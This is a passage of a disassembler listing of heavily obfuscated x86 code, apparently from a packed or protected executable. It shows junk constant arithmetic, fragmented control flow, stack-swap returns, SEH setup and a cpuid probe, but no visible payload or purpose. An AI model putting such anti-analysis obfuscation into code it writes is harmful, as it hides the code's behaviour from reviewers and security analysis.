; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4273CA
loc_4256A5: ; CODE XREF: sub_4273CA:loc_4259CD�j
push eax
call sub_429B49
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jnz loc_4252E5
lea eax, [ebp-125h]
jmp loc_42424C
; END OF FUNCTION CHUNK FOR sub_4273CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427F72
loc_4256C3: ; CODE XREF: sub_427F72:loc_426928�j
; sub_427F72-1636�j
add edi, 0BCB36409h
xchg edi, [esp-4+arg_0]
jmp loc_424A26
; END OF FUNCTION CHUNK FOR sub_427F72
; ---------------------------------------------------------------------------
push eax
ror eax, 11h
push esi
push 5CBD86C1h
jmp loc_424256
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B5B
loc_4256E0: ; CODE XREF: sub_428B5B:loc_4236B4�j
call sub_425C2C
test al, al
jz nullsub_195
jmp loc_42DC1F
; END OF FUNCTION CHUNK FOR sub_428B5B
; ---------------------------------------------------------------------------
loc_4256F2: ; CODE XREF: _7hdaygc1:00424E8C�j
xchg edx, ebp
jnz loc_428530
loc_4256FA: ; CODE XREF: _7hdaygc1:loc_423642�j
rol esi, 17h
and ecx, 7F2D2DDFh
loc_425703: ; CODE XREF: _7hdaygc1:loc_423E92�j
push 1388h
push offset loc_42B3F8
jmp loc_423EFD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_425712: ; CODE XREF: sub_426130-2CD1�j
push eax
push 0F5CA3E9Fh
pop eax
sub eax, 0A3D58981h
jnb loc_42DF98
loc_425725: ; CODE XREF: sub_425339+1C�j
jmp loc_424F89
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
shl ecx, 10h
jmp loc_4236B9
; ---------------------------------------------------------------------------
loc_425732: ; DATA XREF: sub_42AFB3:loc_4266EE�o
pop ecx
pop ebx
retn
; =============== S U B R O U T I N E =======================================
sub_425735 proc near ; CODE XREF: sub_42AFB3+2�p
; FUNCTION CHUNK AT 00425DF6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00427E44 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004280ED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004298E4 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0042B7FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BB14 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0042C746 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042E6A1 SIZE 00000016 BYTES
push large dword ptr fs:0
mov large fs:0, esp
call sub_42986C
call sub_42B9E1
jmp loc_4280ED
sub_425735 endp
; =============== S U B R O U T I N E =======================================
sub_425752 proc near ; DATA XREF: sub_42DD73-9E1F�o
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004239CF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042584B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00426014 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042924F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042A04D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C153 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C80B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042D626 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042F587 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042FBAC SIZE 00000005 BYTES
mov eax, [ebp-4]
push eax
loc_425756: ; CODE XREF: _7hdaygc1:0042C108�j
mov eax, 7FFFh
call sub_42EF30
jno loc_42F587
add eax, 8000h
jmp loc_4239CF
sub_425752 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FD68
loc_425770: ; CODE XREF: sub_42FD68-1C1D�j
shr edi, 9
loc_425773: ; CODE XREF: sub_42FD68-1C29�j
xor ecx, 4ECA0E40h
jns loc_42C45E
sub ebp, 61DAE5BCh
sbb edi, ecx
jmp loc_42C45B
; END OF FUNCTION CHUNK FOR sub_42FD68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BA2C
loc_42578C: ; CODE XREF: sub_42BA2C:loc_429BE8�j
call sub_42D4B1
loc_425791: ; CODE XREF: sub_42B470-284F�j
jmp loc_428FDD
; END OF FUNCTION CHUNK FOR sub_42BA2C
; ---------------------------------------------------------------------------
ror eax, 1Ah
jmp sub_4287D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FCD3
loc_42579E: ; CODE XREF: sub_42FCD3:loc_42B7D3�j
; sub_428498+35B2�j
jnz loc_42DF67
jmp loc_424F8E
; END OF FUNCTION CHUNK FOR sub_42FCD3
; ---------------------------------------------------------------------------
loc_4257A9: ; DATA XREF: sub_424BE6:loc_423B03�o
xchg ebx, [esp]
jmp loc_42D9AD
; ---------------------------------------------------------------------------
loc_4257B1: ; CODE XREF: _7hdaygc1:00429C53�j
pop ebp
jmp loc_4297CE
; ---------------------------------------------------------------------------
loc_4257B7: ; CODE XREF: _7hdaygc1:0042D67D�j
add esp, 8
push esi
push offset loc_426A87
jmp locret_42B9E0
; ---------------------------------------------------------------------------
loc_4257C5: ; DATA XREF: sub_4253A0+520B�o
xchg edi, [esp]
jmp sub_424BE6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_4257CD: ; CODE XREF: sub_423648:loc_426E60�j
mov [ebp-0Ch], eax
jmp loc_42B09C
; ---------------------------------------------------------------------------
loc_4257D5: ; CODE XREF: sub_423648:loc_423652�j
cmp dword ptr [ebp-1Ch], 66h
jnz loc_427D73
mov eax, 6
jmp loc_42D10C
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DB44
loc_4257E9: ; CODE XREF: sub_42DB44+1FBE�j
cpuid
push offset loc_424765
jmp nullsub_152
; END OF FUNCTION CHUNK FOR sub_42DB44
; ---------------------------------------------------------------------------
loc_4257F5: ; CODE XREF: _7hdaygc1:00427083�j
ror ecx, 11h
xor ebp, edx
loc_4257FA: ; CODE XREF: _7hdaygc1:loc_427070�j
or ebx, ds:4000F9h
and ebx, 0C37FBEEFh
add ebx, 3FD770D1h
call sub_42D8AF
; START OF FUNCTION CHUNK FOR sub_42B057
loc_425811: ; CODE XREF: sub_42B057+14�j
jmp nullsub_37
; END OF FUNCTION CHUNK FOR sub_42B057
; ---------------------------------------------------------------------------
loc_425816: ; CODE XREF: _7hdaygc1:004270C4�j
push 235AC278h
; =============== S U B R O U T I N E =======================================
sub_42581B proc near ; CODE XREF: sub_42C443:loc_4239BA�p
; FUNCTION CHUNK AT 00424814 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004262B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042843B SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042860E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D1B8 SIZE 00000023 BYTES
xchg ebx, [esp+0]
pop ebx
jz loc_42481E
jmp loc_42D1B8
sub_42581B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
and ecx, 9167BCBEh
jmp sub_42D16D
; ---------------------------------------------------------------------------
loc_425835: ; DATA XREF: _7hdaygc1:0042A457�o
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FD68
loc_425839: ; CODE XREF: sub_42FD68+C�j
jmp loc_42E13C
; END OF FUNCTION CHUNK FOR sub_42FD68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED2A
loc_42583E: ; CODE XREF: sub_42ED2A-BC73�j
; sub_42ED2A-314�j
mov eax, [ebp-4]
push offset loc_42E50D
jmp loc_425A1B
; END OF FUNCTION CHUNK FOR sub_42ED2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425752
loc_42584B: ; CODE XREF: sub_425752+70CB�j
jz loc_42D626
; END OF FUNCTION CHUNK FOR sub_425752
; START OF FUNCTION CHUNK FOR sub_425522
loc_425851: ; CODE XREF: sub_425522-22BB�j
jmp loc_428FE8
; END OF FUNCTION CHUNK FOR sub_425522
; ---------------------------------------------------------------------------
push ebx
add ecx, eax
jno loc_42A309
loc_42585F: ; CODE XREF: _7hdaygc1:0042D6AC�j
jmp loc_42D626
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E43B
loc_425864: ; CODE XREF: sub_42E43B+1C�j
mov ecx, eax
xchg ecx, [esp+0]
; END OF FUNCTION CHUNK FOR sub_42E43B
; START OF FUNCTION CHUNK FOR sub_42DD73
loc_425869: ; CODE XREF: sub_42DD73:loc_42D1F9�j
mov eax, esp
jmp loc_428A6F
; END OF FUNCTION CHUNK FOR sub_42DD73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4288FE
loc_425870: ; CODE XREF: sub_4288FE�j
mov eax, ds:dword_42B9A0
or eax, eax
jnz loc_423B92
jmp loc_425D1B
; END OF FUNCTION CHUNK FOR sub_4288FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_425883: ; CODE XREF: sub_42E283-4006�j
call sub_424DF3
test al, al
jz nullsub_83
jmp loc_42E2F6
; END OF FUNCTION CHUNK FOR sub_42E283
; ---------------------------------------------------------------------------
xchg eax, ecx
jmp loc_42AD8E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C48C
loc_42589C: ; CODE XREF: sub_42C48C:loc_42C0B7�j
mov eax, [ebp+8]
test byte ptr [eax-8], 80h
jz loc_42B0D4
inc dword ptr [ebp-8]
loc_4258AC: ; CODE XREF: sub_42C48C+1DC3�j
; sub_42C48C:loc_42F5F3�j
mov eax, [ebp-8]
call sub_42B0CC
loc_4258B4: ; CODE XREF: sub_426BF7+64E8�j
jmp nullsub_46
; END OF FUNCTION CHUNK FOR sub_42C48C
; ---------------------------------------------------------------------------
loc_4258B9: ; CODE XREF: _7hdaygc1:0042AB9A�j
jmp loc_42963E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAD5
loc_4258BE: ; CODE XREF: sub_42BAD5-5AEE�j
jmp nullsub_41
; END OF FUNCTION CHUNK FOR sub_42BAD5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424680
loc_4258C3: ; CODE XREF: sub_424680:loc_428BCF�j
sub [ebp-38h], eax
cmp dword ptr [ebp-38h], 0
jle loc_426C06
jmp loc_42AB47
; END OF FUNCTION CHUNK FOR sub_424680
; ---------------------------------------------------------------------------
loc_4258D5: ; CODE XREF: _7hdaygc1:0042319A�j
or eax, 701F2A9Ah
test eax, 200000h
jmp loc_428169
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425008
loc_4258E6: ; CODE XREF: sub_425008+B�j
pop ecx
sub ecx, 0D22DF8E6h
xor ecx, 0AD9E1DF2h
add ecx, 5877F543h
add ecx, ebp
jmp loc_429B89
; END OF FUNCTION CHUNK FOR sub_425008
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BEC6
loc_425900: ; CODE XREF: sub_42BEC6-2834�j
jo loc_42D5C3
shl edx, 1Bh
loc_425909: ; CODE XREF: sub_42BEC6:loc_42D3AD�j
xor eax, 202E3C5Ah
add eax, 0A627CB3Fh
push offset sub_42F642
jmp nullsub_188
; END OF FUNCTION CHUNK FOR sub_42BEC6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42591F: ; CODE XREF: sub_42C16F-1E8B�j
add eax, ebp
add eax, 2A6BBC9Dh
mov eax, [eax]
mov eax, [eax]
shr eax, 0Bh
push 898C4853h
jmp loc_42DD55
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
locret_425938: ; CODE XREF: _7hdaygc1:0042704E�j
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_92. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 2010h
push 0
call sub_42EE8A
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_425946: ; CODE XREF: sub_4291EA-49E�j
xor eax, 0FE0D4E38h
jnz sub_42E0C4
xor ebx, eax
loc_425954: ; CODE XREF: sub_4291EA:loc_4230C2�j
call sub_42D757
mov edx, 0D504D785h
call sub_42C1AF
push ebx
mov ebx, eax
jmp loc_429357
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
loc_42596B: ; CODE XREF: _7hdaygc1:0042B6D7�j
jnz loc_42929E
add ecx, edx
shr esi, 1Dh
jmp loc_429298
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB83
loc_42597B: ; CODE XREF: sub_42BB83:loc_426E5B�j
xchg esi, [esp+0Ch+var_C]
push eax
pushf
push 72A6FDB9h
pop eax
and eax, 0CCC3DD0h
jmp loc_42C8BC
; END OF FUNCTION CHUNK FOR sub_42BB83
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_425991: ; CODE XREF: sub_42C16F-371D�j
jz loc_424906
jmp loc_42D045
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4268D9
loc_42599C: ; CODE XREF: sub_4268D9:loc_428DE1�j
pushf
push 9AB52D1Ah
pop esi
rol esi, 1Bh
add esi, 2B6CF210h
popf
xchg esi, [esp+0]
jmp sub_42C50D
; END OF FUNCTION CHUNK FOR sub_4268D9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A1B6
loc_4259B5: ; CODE XREF: sub_42A1B6+20B0�j
pop edi
and edi, 0FFF68237h
sub edi, 99ABE5EBh
add edi, 628B5F5Eh
call sub_428802
; END OF FUNCTION CHUNK FOR sub_42A1B6
; START OF FUNCTION CHUNK FOR sub_4273CA
loc_4259CD: ; CODE XREF: sub_4273CA+A�j
jmp loc_4256A5
; END OF FUNCTION CHUNK FOR sub_4273CA
; ---------------------------------------------------------------------------
loc_4259D2: ; CODE XREF: _7hdaygc1:004252C3�j
jg loc_4265D1
mov eax, edx
loc_4259DA: ; CODE XREF: _7hdaygc1:loc_428310�j
xor ecx, 74101281h
add ecx, ebp
add ecx, 2C9E0222h
mov ecx, [ecx]
push eax
jmp loc_42F10F
; =============== S U B R O U T I N E =======================================
sub_4259F0 proc near ; CODE XREF: _7hdaygc1:004266D2�j
; sub_42C16F-43B9�p
xchg esi, [esp+0]
pop esi
ror eax, 19h
mov ds:dword_42E534, eax
retn
sub_4259F0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4259FE: ; CODE XREF: _7hdaygc1:0042FBE1�j
jmp loc_42EAA5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42655C
loc_425A03: ; CODE XREF: sub_42655C-B37�j
jmp nullsub_9
; END OF FUNCTION CHUNK FOR sub_42655C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F62
loc_425A08: ; CODE XREF: sub_424F62+B�j
jmp loc_42A35D
; END OF FUNCTION CHUNK FOR sub_424F62
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425A0D proc near ; CODE XREF: sub_42D9E1�j
push ebp
mov ebp, esp
push offset loc_42EBE8
jmp nullsub_66
sub_425A0D endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_65. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED2A
loc_425A1B: ; CODE XREF: sub_42ED2A-94E4�j
jmp nullsub_97
; END OF FUNCTION CHUNK FOR sub_42ED2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42655C
loc_425A20: ; CODE XREF: sub_42655C+B�j
push offset loc_42D278
jmp loc_425A03
; END OF FUNCTION CHUNK FOR sub_42655C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E695
loc_425A2A: ; CODE XREF: sub_42E695-8988�j
jnz loc_42ECA1
not edi
jmp loc_42EC9D
; END OF FUNCTION CHUNK FOR sub_42E695
; =============== S U B R O U T I N E =======================================
sub_425A37 proc near ; CODE XREF: _7hdaygc1:0042A15D�j
; sub_42F65A:loc_42B29A�p
var_10 = dword ptr -10h
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00424DB3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424E3D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425165 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004255B0 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00425A85 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00426031 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042625B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004264D0 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00428576 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428B4A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429DBF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042A017 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0042AD77 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042BA05 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C21F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CB9B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042CCEC SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042E71C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042F4F0 SIZE 00000013 BYTES
xchg edx, [esp+0]
loc_425A3A: ; CODE XREF: _7hdaygc1:00428D9D�j
pop edx
add eax, 250DE66Dh
mov eax, [eax]
call sub_425BAD
loc_425A48: ; CODE XREF: sub_428613:loc_427F4A�j
mov edx, ebp
xchg edx, [esp-4+arg_0]
mov ebp, esp
push ebx
jmp loc_425165
sub_425A37 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_425A55: ; CODE XREF: _7hdaygc1:004262CF�j
sub edx, ebx
ror edi, 1Bh
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_425A5A: ; CODE XREF: sub_423DFC:loc_4262BE�j
and eax, 0CA4BAFCFh
or eax, 7EF89A8Ah
add eax, 270C7E14h
add eax, ebp
add eax, 0D9FAE21Ah
mov eax, [eax]
jmp loc_429B63
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
loc_425A7B: ; CODE XREF: _7hdaygc1:00429F9F�j
push offset loc_425E01
jmp loc_4291C9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A37
loc_425A85: ; CODE XREF: sub_425A37:loc_42C21F�j
popf
pushf
xchg edx, [esp+0]
mov eax, edx
pop edx
xor eax, ecx
jnz loc_429DBF
jmp loc_424E3D
; END OF FUNCTION CHUNK FOR sub_425A37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291CE
loc_425A9A: ; CODE XREF: sub_4291CE:loc_42878F�j
pop ebx
or ebx, 16B9C136h
rol ebx, 17h
and ebx, 41C3B0D8h
jmp loc_425472
; END OF FUNCTION CHUNK FOR sub_4291CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C6FB
loc_425AAF: ; CODE XREF: sub_42C6FB:loc_42A740�j
add ebx, 401B42F2h
shl ecx, 13h
ror ecx, 7
jmp sub_42FA3D
; END OF FUNCTION CHUNK FOR sub_42C6FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A4F1
loc_425AC0: ; CODE XREF: sub_42A4F1+ED2�j
mov eax, ds:dword_4246C8
loc_425AC6: ; CODE XREF: sub_42EE8A:loc_426FCD�j
or eax, eax
jnz loc_42827D
jmp loc_42DA96
; END OF FUNCTION CHUNK FOR sub_42A4F1
; ---------------------------------------------------------------------------
sbb eax, esi
pop esi
loc_425AD6: ; CODE XREF: _7hdaygc1:004235BA�j
cmp ecx, 0E5C53F43h
jmp loc_42A13A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A104
loc_425AE1: ; CODE XREF: sub_42A104+1�j
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp-4], eax
call sub_42C48C
loc_425AEE: ; CODE XREF: sub_423DFC+32E5�j
jmp loc_42F0A0
; END OF FUNCTION CHUNK FOR sub_42A104
; ---------------------------------------------------------------------------
cdq
jmp loc_42F074
; ---------------------------------------------------------------------------
push ebp
push edx
push 0A0FEC4D0h
pop edx
or edx, 94A5F531h
rol edx, 2
add edx, 0E0D675E0h
jmp loc_42AB8E
; ---------------------------------------------------------------------------
loc_425B15: ; CODE XREF: _7hdaygc1:0042B1BB�j
xor edi, 0CBE2F063h
add edi, 28FAF11Bh
rol edi, 13h
add edi, 0F341C1FDh
popf
push offset loc_42D32F
jmp loc_42C47C
; ---------------------------------------------------------------------------
loc_425B35: ; DATA XREF: sub_429318+1CB0�o
call sub_42A94C
mov edx, [ebp-4]
lea eax, [ebp-10h]
push 6158190Bh
pop ecx
sub ecx, 9C306FB6h
or ecx, 56DC81BCh
xor ecx, 42CC9540h
jmp loc_42B1A3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E695
loc_425B5D: ; CODE XREF: sub_42E695-9B65�j
xchg ebp, eax
jmp loc_423B5B
; END OF FUNCTION CHUNK FOR sub_42E695
; ---------------------------------------------------------------------------
loc_425B64: ; DATA XREF: sub_425BAD+8137�o
push ecx
mov esp, ebp
xchg edx, [esp]
mov ebp, edx
pop edx
push 0B2796F04h
pop eax
jmp loc_423CA0
; =============== S U B R O U T I N E =======================================
sub_425B78 proc near ; CODE XREF: _7hdaygc1:00424ECE�j
; _7hdaygc1:0042CAAA�p
; FUNCTION CHUNK AT 004281BF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CB3A SIZE 00000009 BYTES
xchg esi, [esp+0]
pop esi
add edx, 0F4B988C4h
call sub_42C1AF
jmp loc_42CB3A
sub_425B78 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4288FE
loc_425B8C: ; CODE XREF: sub_4288FE+5048�j
pop ebx
rol ebx, 1Ch
sub ebx, 9F3B21E0h
and ebx, 2724F003h
jmp loc_4248A0
; END OF FUNCTION CHUNK FOR sub_4288FE
; ---------------------------------------------------------------------------
adc edi, 0FE13BAE3h
jmp sub_42F05E
; ---------------------------------------------------------------------------
loc_425BAC: ; CODE XREF: _7hdaygc1:00427042�j
pushf
; =============== S U B R O U T I N E =======================================
sub_425BAD proc near ; CODE XREF: sub_425A37+C�p
; FUNCTION CHUNK AT 00424A4B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042649C SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004267DF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042BFDB SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0042C344 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DCDD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042DF01 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042F059 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
push eax
mov eax, [ebp-4]
push eax
push 3E282D92h
pop eax
jmp loc_42C344
sub_425BAD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4252C8
loc_425BC1: ; CODE XREF: sub_4252C8+A�j
push offset loc_42CE3F
jmp loc_42A88D
; END OF FUNCTION CHUNK FOR sub_4252C8
; ---------------------------------------------------------------------------
loc_425BCB: ; CODE XREF: _7hdaygc1:0042ABDE�j
xchg edi, ebx
; =============== S U B R O U T I N E =======================================
sub_425BCD proc near ; CODE XREF: _7hdaygc1:0042BE0E�p
; FUNCTION CHUNK AT 0042B1C0 SIZE 00000014 BYTES
xchg ecx, [esp+0]
pop ecx
push 69F6F3FFh
pop eax
or eax, 0DAB43A9Dh
xor eax, 0EE3A7CDFh
jmp loc_42B1C0
sub_425BCD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_425BE8: ; DATA XREF: _7hdaygc1:0042AA7B�o
mov ds:dword_425154, eax
; START OF FUNCTION CHUNK FOR sub_4291A3
loc_425BED: ; CODE XREF: sub_42C119-439B�j
; _7hdaygc1:00427D89�j ...
mov esp, ebp
pop ebp
push ds:dword_425154
retn
; END OF FUNCTION CHUNK FOR sub_4291A3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42524F
loc_425BF7: ; CODE XREF: sub_42524F+171D�j
jmp loc_42B431
; END OF FUNCTION CHUNK FOR sub_42524F
; =============== S U B R O U T I N E =======================================
sub_425BFC proc near ; CODE XREF: sub_4291A3-5037�p
; sub_4291A3-127B�p
; FUNCTION CHUNK AT 004246BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C530 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042F36D SIZE 00000005 BYTES
mov eax, cs
xor al, al
or eax, eax
jmp loc_42F36D
sub_425BFC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F3C8
loc_425C07: ; CODE XREF: sub_42F3C8-1959�j
xor eax, 200000h
push esi
mov esi, eax
xchg esi, [esp+14h+var_14]
jmp loc_4242B1
; END OF FUNCTION CHUNK FOR sub_42F3C8
; ---------------------------------------------------------------------------
push 2010h
push 0
mov eax, [ebp-4]
push esi
mov esi, eax
xchg esi, [esp]
jmp loc_42808D
; =============== S U B R O U T I N E =======================================
sub_425C2C proc near ; CODE XREF: _7hdaygc1:004253F5�j
; sub_428B5B:loc_4256E0�p
; FUNCTION CHUNK AT 00423987 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423F33 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426826 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00426D0B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426E43 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042A9ED SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042BC94 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042BF18 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042D869 SIZE 0000000C BYTES
xchg ebx, [esp+0]
pop ebx
inc dword ptr [ebp-0Ch]
dec dword ptr [ebp-18h]
jmp loc_423987
sub_425C2C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_425C3B proc near ; CODE XREF: _7hdaygc1:00424789�j
; sub_425A37+9AC2�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042312E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423488 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00423E43 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042487A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00424D5F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00426206 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00426A5D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427D07 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428422 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00429976 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429BAD SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00429C13 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042A03E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A3A7 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0042A911 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042CF16 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042E08C SIZE 0000002D BYTES
; FUNCTION CHUNK AT 0042E706 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042F7C9 SIZE 00000017 BYTES
xchg esi, [esp+0]
pop esi
mov eax, [eax]
mov eax, [eax]
loc_425C43: ; CODE XREF: sub_424588+6�j
push ebx
push 0FF9073A2h
pop ebx
jmp loc_426A5D
sub_425C3B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D002
loc_425C4F: ; CODE XREF: sub_42D002+14�j
pop edx
xchg ebx, [ebp+0]
popf
cmp edi, 0F84CBB1h
jmp loc_42651E
; END OF FUNCTION CHUNK FOR sub_42D002
; =============== S U B R O U T I N E =======================================
sub_425C5F proc near ; DATA XREF: _7hdaygc1:004234D2�o
shl eax, cl
push offset loc_4248E4
jmp nullsub_177
sub_425C5F endp
; ---------------------------------------------------------------------------
loc_425C6B: ; CODE XREF: _7hdaygc1:00424B9A�j
cdq
pop eax
loc_425C6D: ; CODE XREF: _7hdaygc1:loc_42825F�j
mov eax, 400h
push offset sub_428A39
jmp locret_42BF31
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4270E6
loc_425C7C: ; CODE XREF: sub_4270E6-1F75�j
; sub_4270E6+5239�j
rol ebx, 0Eh
add ebx, 0A861F357h
xchg ebx, [esp+0]
jmp sub_428C3B
; END OF FUNCTION CHUNK FOR sub_4270E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_425C8D: ; CODE XREF: sub_423172+3A1A�j
sub edi, esi
loc_425C8F: ; CODE XREF: sub_423172:loc_426B80�j
rol ebx, 0Fh
add ebx, 0D5B12B11h
